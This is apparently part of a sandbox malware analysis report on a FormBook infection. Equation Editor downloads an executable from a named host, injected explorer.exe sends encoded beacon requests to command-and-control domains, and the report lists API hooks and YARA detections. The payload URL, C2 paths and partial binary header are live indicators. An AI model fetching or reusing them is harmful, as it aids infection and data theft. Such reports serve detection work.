                                            Jan 14, 2022 08:05:05.861814022 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861867905 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861929893 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.861943007 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.861984968 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862015009 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862068892 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862081051 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862123013 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862154007 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862206936 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862217903 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862258911 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862288952 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862333059 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862345934 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862380028 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862416029 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862478018 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862499952 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862557888 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862569094 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862607002 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862627983 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.862659931 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.862720966 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.863198042 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913188934 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913225889 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913254976 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913284063 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913321018 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913346052 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913361073 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913393021 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913414001 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913444996 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913460016 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913491964 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913510084 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913541079 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913572073 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913585901 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913615942 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913639069 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913654089 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913686991 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913703918 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913734913 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913765907 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913796902 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913810968 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913841963 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913876057 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913898945 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.913928032 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913957119 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.913989067 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.914016008 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.914025068 CET4916580192.168.2.2291.203.68.162
                                            Jan 14, 2022 08:05:05.914055109 CET804916591.203.68.162192.168.2.22
                                            Jan 14, 2022 08:05:05.914078951 CET4916580192.168.2.2291.203.68.162

                                            UDP Packets

                                            TimestampSource PortDest PortSource IPDest IP
                                            Jan 14, 2022 08:05:05.660314083 CET5216753192.168.2.228.8.8.8
                                            Jan 14, 2022 08:05:05.679891109 CET53521678.8.8.8192.168.2.22
                                            Jan 14, 2022 08:06:29.366249084 CET5059153192.168.2.228.8.8.8
                                            Jan 14, 2022 08:06:29.511981964 CET53505918.8.8.8192.168.2.22
                                            Jan 14, 2022 08:06:47.769885063 CET5780553192.168.2.228.8.8.8
                                            Jan 14, 2022 08:06:47.791002035 CET53578058.8.8.8192.168.2.22

                                            DNS Queries

                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                            Jan 14, 2022 08:05:05.660314083 CET192.168.2.228.8.8.80x8c5Standard query (0)rfr.ltA (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:29.366249084 CET192.168.2.228.8.8.80xfc43Standard query (0)www.ponto-bras.spaceA (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.769885063 CET192.168.2.228.8.8.80x9c63Standard query (0)www.hydrogendatapower.comA (IP address)IN (0x0001)

                                            DNS Answers

                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                            Jan 14, 2022 08:05:05.679891109 CET8.8.8.8192.168.2.220x8c5No error (0)rfr.lt91.203.68.162A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:29.511981964 CET8.8.8.8192.168.2.220xfc43No error (0)www.ponto-bras.spaceshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                            Jan 14, 2022 08:06:29.511981964 CET8.8.8.8192.168.2.220xfc43No error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)www.hydrogendatapower.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)
                                            Jan 14, 2022 08:06:47.791002035 CET8.8.8.8192.168.2.220x9c63No error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)

                                            HTTP Request Dependency Graph

                                            • rfr.lt
                                            • www.ponto-bras.space
                                            • www.hydrogendatapower.com

                                            HTTP Packets

                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            0192.168.2.224916591.203.68.16280C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            TimestampkBytes transferredDirectionData
                                            Jan 14, 2022 08:05:05.749198914 CET0OUTGET /ctf.exe HTTP/1.1
                                            Accept: */*
                                            Accept-Encoding: gzip, deflate
                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                            Host: rfr.lt
                                            Connection: Keep-Alive
                                            Jan 14, 2022 08:05:05.809087038 CET2INHTTP/1.1 200 OK
                                            Server: nginx
                                            Date: Fri, 14 Jan 2022 07:05:05 GMT
                                            Content-Type: application/octet-stream
                                            Content-Length: 248302
                                            Last-Modified: Thu, 13 Jan 2022 11:11:05 GMT
                                            Connection: keep-alive
                                            ETag: "61e008c9-3c9ee"
                                            Expires: Sun, 13 Feb 2022 07:05:05 GMT
                                            Cache-Control: max-age=2592000
                                            Accept-Ranges: bytes
                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 e5 75 4a a8 a1 14 24 fb a1 14 24 fb a1 14 24 fb 2f 1c 7b fb a3 14 24 fb a1 14 25 fb 3a 14 24 fb 22 1c 79 fb b0 14 24 fb f5 37 14 fb a8 14 24 fb 66 12 22 fb a0 14 24 fb 52 69 63 68 a1 14 24 fb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c9 cd ef 48 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 5a 00 00 00 d4 01 00 00 04 00 00 25 32 00 00 00 10 00 00 00 70 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 d0 02 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 a4 73 00 00 b4 00 00 00 00 c0 02 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 00 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 76 59 00 00 00 10 00 00 00 5a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 11 00 00 00 70 00 00 00 12 00 00 00 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 af 01 00 00 90 00 00 00 04 00 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 80 00 00 00 40 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 00 09 00 00 00 c0 02 00 00 0a 00 00 00 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$uJ$$$/{$%:$"y$7$f"$Rich$PELHZ%2p@sp.textvYZ `.rdatap^@@.datap@.ndata@.rsrct@@


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            1192.168.2.224916623.227.38.7480C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 14, 2022 08:06:29.538696051 CET265OUTGET /nk6l/?f4=dUEi0UXeDjZ3satn024Wp6SV8B9ayfLzJlVAsh/H0s9uKTFfRfoB4Zp7QfR2IB/+as7LEQ==&9r7t=5jSPntk89D HTTP/1.1
                                            Host: www.ponto-bras.space
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 14, 2022 08:06:29.588784933 CET266INHTTP/1.1 403 Forbidden
                                            Date: Fri, 14 Jan 2022 07:06:29 GMT
                                            Content-Type: text/html
                                            Transfer-Encoding: chunked
                                            Connection: close
                                            Vary: Accept-Encoding
                                            X-Sorting-Hat-PodId: -1
                                            X-Dc: gcp-europe-west1
                                            X-Request-ID: 99fb20a9-766c-40f0-9df4-b158c5fb1252
                                            X-Content-Type-Options: nosniff
                                            X-Permitted-Cross-Domain-Policies: none
                                            X-XSS-Protection: 1; mode=block
                                            X-Download-Options: noopen
                                            CF-Cache-Status: DYNAMIC
                                            Server: cloudflare
                                            CF-RAY: 6cd5059eac695c85-FRA
                                            alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                            Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 76 68 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 74 65 78 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 2d 6d 61 69 6e 7b 66 6c 65 78 3a 31 3b 64 69 73
                                            Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{font-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;dis


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            2192.168.2.2249168198.54.117.21280C:\Windows\explorer.exe
                                            TimestampkBytes transferredDirectionData
                                            Jan 14, 2022 08:06:47.968044043 CET272OUTGET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1
                                            Host: www.hydrogendatapower.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:
                                            Jan 14, 2022 08:06:48.522605896 CET272OUTGET /nk6l/?f4=mG3MZX+V/2vUvLkm+jLYc6BPCVMMOHSbAyziOVKuBi9N3RYpJJdcI8Zb3DbFfMMicqDibw==&9r7t=5jSPntk89D HTTP/1.1
                                            Host: www.hydrogendatapower.com
                                            Connection: close
                                            Data Raw: 00 00 00 00 00 00 00
                                            Data Ascii:


                                            Code Manipulations

                                            User Modules

                                            Hook Summary

                                            Function NameHook TypeActive in Processes
                                            PeekMessageAINLINEexplorer.exe
                                            PeekMessageWINLINEexplorer.exe
                                            GetMessageWINLINEexplorer.exe
                                            GetMessageAINLINEexplorer.exe

                                            Processes

                                            Process: explorer.exe, Module: USER32.dll
                                            Function NameHook TypeNew Data
                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEF
                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEF
                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8D 0xDE 0xEF
                                            GetMessageAINLINE0x48 0x8B 0xB8 0x85 0x5E 0xEF

                                            Statistics

                                            Behavior

                                            Click to jump to process

                                            System Behavior

                                            Analysis Process: EXCEL.EXE PID: 1444 Parent PID: 596

                                            General

                                            Start time:08:05:20
                                            Start date:14/01/2022
                                            Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                            Imagebase:0x13fc20000
                                            File size:28253536 bytes
                                            MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: EQNEDT32.EXE PID: 2860 Parent PID: 596

                                            General

                                            Start time:08:05:39
                                            Start date:14/01/2022
                                            Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                            Wow64 process (32bit):true
                                            Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                            Imagebase:0x400000
                                            File size:543304 bytes
                                            MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high

                                            Analysis Process: word.exe PID: 2256 Parent PID: 2860

                                            General

                                            Start time:08:05:41
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Roaming\word.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\word.exe
                                            Imagebase:0x400000
                                            File size:248302 bytes
                                            MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.460945641.0000000000430000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            Antivirus matches:
                                            • Detection: 100%, Joe Sandbox ML
                                            • Detection: 42%, ReversingLabs
                                            Reputation:low

                                            Analysis Process: word.exe PID: 1612 Parent PID: 2256

                                            General

                                            Start time:08:05:42
                                            Start date:14/01/2022
                                            Path:C:\Users\user\AppData\Roaming\word.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Users\user\AppData\Roaming\word.exe
                                            Imagebase:0x400000
                                            File size:248302 bytes
                                            MD5 hash:8EDDCC35719034649F6947B2B08BCDF3
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.517826427.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.517788299.0000000000380000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.459390145.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.460598651.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.460114935.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.518045796.00000000007D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:low

                                            Analysis Process: explorer.exe PID: 1764 Parent PID: 1612

                                            General

                                            Start time:08:05:45
                                            Start date:14/01/2022
                                            Path:C:\Windows\explorer.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\Explorer.EXE
                                            Imagebase:0xffa10000
                                            File size:3229696 bytes
                                            MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.483096274.0000000009453000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.490835937.0000000009453000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                            Reputation:high

                                            Analysis Process: cscript.exe PID: 2980 Parent PID: 1764

                                            General

                                            Start time:08:06:08
                                            Start date:14/01/2022
                                            Path:C:\Windows\SysWOW64\cscript.exe
                                            Wow64 process (32bit):true
                                            Commandline:C:\Windows\SysWOW64\cscript.exe
                                            Imagebase:0x8c0000
                                            File size:126976 bytes
                                            MD5 hash:A3A35EE79C64A640152B3113E6E254E2
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, Author: Joe Security
                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.673558642.0000000000070000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
